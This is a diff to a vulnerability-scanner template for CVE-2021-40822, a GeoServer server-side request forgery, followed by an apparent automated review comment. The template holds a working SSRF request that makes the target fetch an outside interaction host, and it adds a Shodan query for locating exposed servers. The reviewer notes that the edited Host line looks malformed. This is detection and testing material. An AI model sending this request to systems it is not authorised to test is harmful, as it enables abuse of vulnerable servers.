diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 0888e11fad..ca439dd319 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -2,7 +2,7 @@ id: CVE-2021-40822 info: name: Geoserver - Server-Side Request Forgery - author: For3stCo1d + author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. reference: @@ -19,29 +19,31 @@ info: epss-score: 0.65495 metadata: max-request: 1 - fofa-query: app="GeoServer" verified: true + shodan-query: title:"GeoServer" + fofa-query: app="GeoServer" tags: cve,cve2021,ssrf,geoserver http: - raw: - | POST /geoserver/TestWfsPost HTTP/1.1 - Host: {{Hostname}} + Host: {{oast.pro}} Content-Type: application/x-www-form-urlencoded - form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password= + form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password= matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body words: - - "http" + - "Interactsh" - type: word + part: header words: - - "" + - "text/html" - type: status status:
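Review bot: The new `Host: {{oast.pro}}` line in the raw request wraps a literal domain in variable delimiters, and the visible parts of the template define no variable of that name, so the engine will most likely treat it as an unresolved placeholder and skip the request or send a wrong Host. If the intent is a fixed Host value, it should read `Host: oast.pro`. The same hunk replaces the per-scan `{{interactsh-url}}` callback with a hard-coded public host and matches on `"Interactsh"` in the body plus `text/html` in the header, so a positive now depends on that third-party page being reachable from the target and keeping its current wording, and a scan configured with a self-hosted interaction server no longer uses it. The header matcher adds little, since almost any HTML response satisfies it. If the reflected page body is meant to be the evidence, a comment above the request such as `# match relies on the fetched page being reflected in the response body, not on an OAST callback` would make that explicit; the status matcher continues past the end of this hunk.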